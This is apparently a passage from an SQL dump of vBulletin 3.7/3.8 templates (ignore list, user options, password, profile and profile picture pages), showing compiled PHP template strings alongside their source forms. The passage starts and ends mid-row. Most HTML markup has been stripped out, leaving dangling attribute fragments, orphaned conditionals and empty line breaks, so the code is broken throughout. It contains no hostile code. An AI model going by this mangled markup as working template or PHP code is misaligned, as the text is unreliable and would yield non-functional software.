  • \r\n', 'template', 1197388197, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1423, -1, 'modifyignorelist', '\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[ignore_list]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[ignore_list]\r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \".(($ignorelist) ? (\"\r\n
      \r\n $ignorelist\r\n
    \r\n \") : (\"\")).\"\r\n
    \r\n \r\n \\\"\\\"\r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n
    \\\"\\\"
    \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    $vbphrase[ignorelist_instructions]
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n\r\n\r\n\".(($show[\'popups\']) ? (\"\r\n\r\n\") : (\"\")).\"\r\n\r\n', '\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[ignore_list]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[ignore_list]\r\n
    style=\"display: none\">\r\n \r\n \r\n \r\n \r\n \r\n
      \r\n $ignorelist\r\n
    \r\n
    \r\n
    \r\n \r\n \"\"\r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n \r\n \r\n \r\n \r\n
    \"\"
    \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    $vbphrase[ignorelist_instructions]
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n', 'template', 1213273344, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1424, -1, 'modifyignorelist_user', '
  • \r\n session->vars[\'sessionurl\'] . \"u=$user[userid]\\\">$user[username]\r\n
  • ', '
  • \r\n $user[username]\r\n
  • ', 'template', 1204241120, 'vBulletin Solutions', '3.7.0 Beta 6', 'vbulletin'), (1425, -1, 'modifyoptions', '\r\n\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n$template_hook[usercp_options_start]\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n
    $vbphrase[edit_options]: \" . $GLOBALS[\'vbulletin\']->userinfo[\'username\'] . \"
    \r\n \\\"\\\"\r\n $vbphrase[login_privacy]\r\n
    \r\n
    \r\n
    \r\n\r\n \".(($show[\'invisibleoption\']) ? (\"\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[invisible_mode_allows]
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'reputationoption\']) ? (\"\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \" . construct_phrase(\"$vbphrase[current_reputation_level_is_displayed]\", \"\" . $GLOBALS[\'vbulletin\']->userinfo[\'reputation\'] . \"\") . \"\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[may_allow_users_tdownload_vcard]\r\n
    \r\n
    \r\n\r\n $template_hook[usercp_options_privacy]\r\n\r\n $customfields[login]\r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \\\"\\\"\r\n $vbphrase[messaging_notification]\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[receive_email]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \".(($show[\'receiveemail\']) ? (\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n \".(($show[friend_email_request]) ? (\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n
    \r\n $vbphrase[administrators_may_send_email]\r\n

    $vbphrase[allow_members_send_you_email]

    $vbphrase[receive_email_for_friendship_request]
    \r\n
    \r\n \".((!$GLOBALS[\'vbulletin\']->options[\'enableemail\']) ? (\"\r\n userinfo[\'showemail\'] . \"\\\" />\r\n \") : (\"\")).\"\r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \" . construct_phrase(\"$vbphrase[can_automatically_subscribe]\", \"subscription.php\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl_q\'] . \"\") . \"
    \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n \".(($show[\'pmoptions\']) ? (\"\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n userinfo[receivepm]) ? (\" disabled=\\\"disabled\\\"\") : (\"\")).\">\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \" . construct_phrase(\"$vbphrase[features_private_messaging_system]\", \"private.php\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl_q\'] . \"\") . \"\r\n

    $vbphrase[accept_pm_only_from_contacts]

    $vbphrase[can_email_when_sends_you_pm]

    $vbphrase[browsing_when_receive_pm_popup]

    $vbphrase[save_pm_copy_by_default]
    \r\n
    \r\n \") : (\"\r\n userinfo[\'receivepm\'] . \"\\\" />\r\n userinfo[\'emailonpm\'] . \"\\\" />\r\n userinfo[\'pmpopup\'] . \"\\\" />\r\n \")).\"\r\n\r\n \".(($show[\'vmoptions\']) ? (\"\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n userinfo[vm_enable]) ? (\" disabled=\\\"disabled\\\"\") : (\"\")).\">\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \" . construct_phrase(\"$vbphrase[features_visitor_messaging_system]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=\" . $GLOBALS[\'vbulletin\']->userinfo[\'userid\'] . \"\") . \"\r\n

    \" . construct_phrase(\"$vbphrase[usage_vm_only_from_contacts]\", \"profile.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=buddylist\") . \"
    \r\n
    \r\n \") : (\"\r\n userinfo[\'vm_enable\'] . \"\\\" />\r\n userinfo[\'vm_contactonly\'] . \"\\\" />\r\n \")).\"\r\n\r\n $template_hook[usercp_options_messaging]\r\n\r\n $customfields[messaging]\r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \\\"\\\"\r\n $vbphrase[thread_display_options]\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[visible_post_elements]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[option_to_hide_elements]
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \" . construct_phrase(\"$vbphrase[choose_thread_display_mode]\", \"faq.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"faq=vb3_board_usage#faq_vb3_thread_display\") . \"
    \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n \".(($show[\'maxpostsoptions\']) ? (\"\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[use_set_posts_before_splitting]
    \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n \") : (\"\r\n userinfo[\'maxposts\'] . \"\\\" />\r\n \")).\"\r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[time_period_to_display_threads]
    \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n $template_hook[usercp_options_threadview]\r\n\r\n $customfields[threadview]\r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \\\"\\\"\r\n $vbphrase[date_time_options]\r\n
    \r\n
    \r\n
    \r\n\r\n $timezoneoptions\r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[parts_use_different_start_of_week]
    \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n $template_hook[usercp_options_datetime]\r\n\r\n $customfields[datetime]\r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \\\"\\\"\r\n $vbphrase[miscellaneous_options]\r\n
    \r\n
    \r\n
    \r\n\r\n \".(($show[\'editormode_picker\']) ? (\"\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[entering_message_three_interface]
    \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n \") : (\"\r\n userinfo[\'showvbcode\'] . \"\\\" />\r\n \")).\"\r\n\r\n \".(($show[\'styleoption\']) ? (\"\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[switch_skin_select]\r\n
    \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'usercssoption\']) ? (\"\r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[use_can_make_customizations]\r\n
    \r\n \r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'languageoption\']) ? (\"\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[board_can_be_shown_any_language]
    \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n $template_hook[usercp_options_other]\r\n\r\n $customfields[other]\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n$template_hook[usercp_options_end]\r\n\r\n
    ', '\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n$template_hook[usercp_options_start]\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n
    $vbphrase[edit_options]: $bbuserinfo[username]
    \r\n \"\"\r\n $vbphrase[login_privacy]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[invisible_mode_allows]
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[current_reputation_level_is_displayed]\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[may_allow_users_tdownload_vcard]\r\n
    \r\n
    \r\n\r\n $template_hook[usercp_options_privacy]\r\n\r\n $customfields[login]\r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \"\"\r\n $vbphrase[messaging_notification]\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[receive_email]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[administrators_may_send_email]\r\n

    $vbphrase[allow_members_send_you_email]

    $vbphrase[receive_email_for_friendship_request]
    \r\n
    \r\n \r\n \r\n \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[can_automatically_subscribe]
    \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n disabled=\"disabled\">\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[features_private_messaging_system]\r\n

    $vbphrase[accept_pm_only_from_contacts]

    $vbphrase[can_email_when_sends_you_pm]

    $vbphrase[browsing_when_receive_pm_popup]

    $vbphrase[save_pm_copy_by_default]
    \r\n
    \r\n \r\n \r\n \r\n \r\n
    \r\n\r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n disabled=\"disabled\">\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[features_visitor_messaging_system]\r\n

    $vbphrase[usage_vm_only_from_contacts]
    \r\n
    \r\n \r\n \r\n \r\n
    \r\n\r\n $template_hook[usercp_options_messaging]\r\n\r\n $customfields[messaging]\r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \"\"\r\n $vbphrase[thread_display_options]\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[visible_post_elements]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[option_to_hide_elements]
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[choose_thread_display_mode]
    \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[use_set_posts_before_splitting]
    \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n \r\n \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[time_period_to_display_threads]
    \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n $template_hook[usercp_options_threadview]\r\n\r\n $customfields[threadview]\r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \"\"\r\n $vbphrase[date_time_options]\r\n
    \r\n
    \r\n
    \r\n\r\n $timezoneoptions\r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[parts_use_different_start_of_week]
    \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n $template_hook[usercp_options_datetime]\r\n\r\n $customfields[datetime]\r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \"\"\r\n $vbphrase[miscellaneous_options]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[entering_message_three_interface]
    \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n \r\n \r\n
    \r\n\r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[switch_skin_select]\r\n
    \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[use_can_make_customizations]\r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[board_can_be_shown_any_language]
    \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n $template_hook[usercp_options_other]\r\n\r\n $customfields[other]\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n$template_hook[usercp_options_end]\r\n\r\n
    ', 'template', 1239016356, 'vBulletin Solutions', '3.8.3', 'vbulletin'), (1426, -1, 'modifyoptions_timezone', '
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[time_auto_corrected_to_location]
    \r\n \r\n \r\n \r\n \r\n
    $vbphrase[allow_daylight_savings_time]
    \r\n \r\n \r\n \r\n \r\n
    \r\n
    ', '
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[time_auto_corrected_to_location]
    \r\n \r\n \r\n \r\n \r\n
    $vbphrase[allow_daylight_savings_time]
    \r\n \r\n \r\n \r\n \r\n
    \r\n
    ', 'template', 1073264751, 'vBulletin Solutions', '', 'vbulletin'), (1427, -1, 'modifypassword', '\r\n\r\n\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n
    \r\n \".(($show[\'edit_email_field\']) ? (\"\r\n $vbphrase[edit_email_and_password]\r\n \") : (\"\r\n $vbphrase[edit_password]\r\n \")).\"\r\n
    \r\n
    \r\n
    \r\n \".(($show[\'passwordexpired\']) ? (\"\r\n
    \r\n $vbphrase[current_password_expired]\r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n
    $vbphrase[enter_password_to_continue]:
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[edit_password]\".(($show[\'password_optional\']) ? (\" ($vbphrase[optional])\") : (\"\")).\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    $vbphrase[new_password]:
    \r\n
    \r\n
    \r\n
    $vbphrase[confirm_new_password]:
    \r\n
    \r\n
    \r\n
    \r\n\r\n \".(($show[\'edit_email_field\']) ? (\"\r\n
    \r\n $vbphrase[edit_email_address] ($vbphrase[optional])\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    $vbphrase[new_email_address]:
    \r\n
    userinfo[\'email\'] . \"\\\" size=\\\"50\\\" maxlength=\\\"50\\\" dir=\\\"ltr\\\" />
    \r\n
    \r\n
    $vbphrase[confirm_new_email_address]:
    \r\n
    userinfo[\'email\'] . \"\\\" size=\\\"50\\\" maxlength=\\\"50\\\" dir=\\\"ltr\\\" />
    \r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', '\r\n\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n
    \r\n \r\n $vbphrase[edit_email_and_password]\r\n \r\n $vbphrase[edit_password]\r\n \r\n
    \r\n
    \r\n
    \r\n \r\n
    \r\n $vbphrase[current_password_expired]\r\n
    \r\n
    \r\n\r\n
    \r\n
    $vbphrase[enter_password_to_continue]:
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[edit_password] ($vbphrase[optional])\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    $vbphrase[new_password]:
    \r\n
    \r\n
    \r\n
    $vbphrase[confirm_new_password]:
    \r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[edit_email_address] ($vbphrase[optional])\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    $vbphrase[new_email_address]:
    \r\n
    \r\n
    \r\n
    $vbphrase[confirm_new_email_address]:
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', 'template', 1208876212, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1428, -1, 'modifyprivacy_bit', '\r\n \r\n \r\n \r\n  \r\n \r\n \r\n \r\n', '\r\n \r\n \r\n \r\n  \r\n \r\n \r\n \r\n', 'template', 1218459190, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1429, -1, 'modifyprofile', '\".(($GLOBALS[\'vbulletin\']->userinfo[\'coppauser\']) ? (\"\r\n\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[coppa_information]
    \r\n
    \r\n
    \r\n\r\n

    \r\n \" . construct_phrase(\"$vbphrase[make_changes_parent_notified]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'contactuslink\'] . \"\") . \"\r\n

    \r\n\r\n

    \r\n $vbphrase[print_new_permissions_form]\r\n

    \r\n\r\n \r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n\") : (\"\")).\"\r\n\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[edit_your_details] \" . $GLOBALS[\'vbulletin\']->userinfo[\'username\'] . \"
    $vbphrase[registration_required_information]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[email_and_password]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[click_button_below_edit_email]
    \r\n \r\n options[\'cleargifurl\'] . \"\\\" style=\\\"width: 1px; height: 1px;\\\" />\r\n \r\n \r\n
    \r\n
    \r\n\r\n \".(($GLOBALS[\'vbulletin\']->userinfo[\'coppauser\']) ? (\"\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[if_under_13_provide_parent]
    \r\n $vbphrase[parent_guardian_email]
    \r\n userinfo[\'parentemail\'] . \"\\\" />\r\n \r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'birthday_required\']) ? (\"\r\n $birthdaybit\r\n \") : (\"\")).\"\r\n\r\n $customfields[required]\r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[optional_information_will]
    \r\n
    \r\n
    \r\n\r\n \".(($show[\'customtitleoption\']) ? (\"\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[title_appears_beneath_your_name]
    $vbphrase[your_current_user_title_is]
    \" . $GLOBALS[\'vbulletin\']->userinfo[\'usertitle\'] . \"
    $vbphrase[custom_user_title]
    options[\'ctMaxChars\'] . \"\\\" />
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'birthday_optional\']) ? (\"\r\n $birthdaybit\r\n \") : (\"\")).\"\r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[let_other_visitors_know_url]
    $vbphrase[home_page_url]
    userinfo[\'homepage\'] . \"\\\" size=\\\"50\\\" maxlength=\\\"200\\\" dir=\\\"ltr\\\" />
    \r\n
    \r\n\r\n
    \r\n $vbphrase[instant_messaging]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[may_enter_identity_for_im]
    $vbphrase[icq_number]
    \r\n \\\"\\\"\r\n userinfo[\'icq\'] . \"\\\" size=\\\"25\\\" maxlength=\\\"30\\\" dir=\\\"ltr\\\" />
    $vbphrase[aim_screen_name]
    \r\n \\\"\\\"\r\n userinfo[\'aim\'] . \"\\\" size=\\\"25\\\" maxlength=\\\"30\\\" dir=\\\"ltr\\\" />
    $vbphrase[msn_messenger_handle]
    \r\n \\\"\\\"\r\n userinfo[\'msn\'] . \"\\\" size=\\\"25\\\" maxlength=\\\"50\\\" dir=\\\"ltr\\\" />
    $vbphrase[yahoo_messenger_handle]
    \r\n \\\"\\\"\r\n userinfo[\'yahoo\'] . \"\\\" size=\\\"25\\\" maxlength=\\\"30\\\" dir=\\\"ltr\\\" />
    $vbphrase[skype_name]
    \r\n \\\"\\\"\r\n userinfo[\'skype\'] . \"\\\" size=\\\"25\\\" maxlength=\\\"32\\\" dir=\\\"ltr\\\" />
     
    \r\n
    \r\n\r\n\".(($customfields[\'regular\']) ? (\"\r\n\r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[additional_information]
    \r\n
    \r\n
    \r\n\r\n $customfields[regular]\r\n\r\n\r\n\") : (\"\")).\"\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', '\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[coppa_information]
    \r\n
    \r\n
    \r\n\r\n

    \r\n $vbphrase[make_changes_parent_notified]\r\n

    \r\n\r\n

    \r\n $vbphrase[print_new_permissions_form]\r\n

    \r\n\r\n \r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[edit_your_details] $bbuserinfo[username]
    $vbphrase[registration_required_information]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[email_and_password]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[click_button_below_edit_email]
    \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[if_under_13_provide_parent]
    \r\n $vbphrase[parent_guardian_email]
    \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n \r\n $birthdaybit\r\n \r\n\r\n $customfields[required]\r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[optional_information_will]
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[title_appears_beneath_your_name]
    $vbphrase[your_current_user_title_is]
    $bbuserinfo[usertitle]
    $vbphrase[custom_user_title]
    \r\n
    \r\n
    \r\n\r\n \r\n $birthdaybit\r\n \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[let_other_visitors_know_url]
    $vbphrase[home_page_url]
    \r\n
    \r\n\r\n
    \r\n $vbphrase[instant_messaging]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[may_enter_identity_for_im]
    $vbphrase[icq_number]
    \r\n \"\"\r\n
    $vbphrase[aim_screen_name]
    \r\n \"\"\r\n
    $vbphrase[msn_messenger_handle]
    \r\n \"\"\r\n
    $vbphrase[yahoo_messenger_handle]
    \r\n \"\"\r\n
    $vbphrase[skype_name]
    \r\n \"\"\r\n
     
    \r\n
    \r\n\r\n\r\n\r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[additional_information]
    \r\n
    \r\n
    \r\n\r\n $customfields[regular]\r\n\r\n\r\n\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', 'template', 1213274529, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1430, -1, 'modifyprofilepic', '
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[edit_profile_picture]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[your_current_profile_picture]\r\n \r\n \r\n \".((!$show[\'profilepic\']) ? (\"\r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n \r\n \r\n
    \r\n $vbphrase[no_profile_picture]\r\n \r\n userinfo[\'profileurl\'] . \"\\\" alt=\\\"$vbphrase[your_profile_picture]\\\" border=\\\"0\\\" />\r\n \r\n
    $vbphrase[profile_picture_desc]
    \r\n \".(($show[\'profilepic\']) ? (\"
    \") : (\"\")).\"\r\n
    \r\n
    \r\n\r\n\r\n
    \r\n $vbphrase[custom_profile_picture]\r\n\r\n
    \r\n
    \r\n\r\n $vbphrase[may_upload_custom_image_controls]

    \r\n\r\n \".(($show[\'profilepic_url\']) ? (\"\r\n $vbphrase[enter_url_to_image]\r\n\r\n
    \r\n \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'profilepic_url\']) ? (\"$vbphrase[option_2_upload_image_from_computer]\") : (\"$vbphrase[upload_image_from_computer]\")).\"\r\n
    \r\n \r\n \r\n
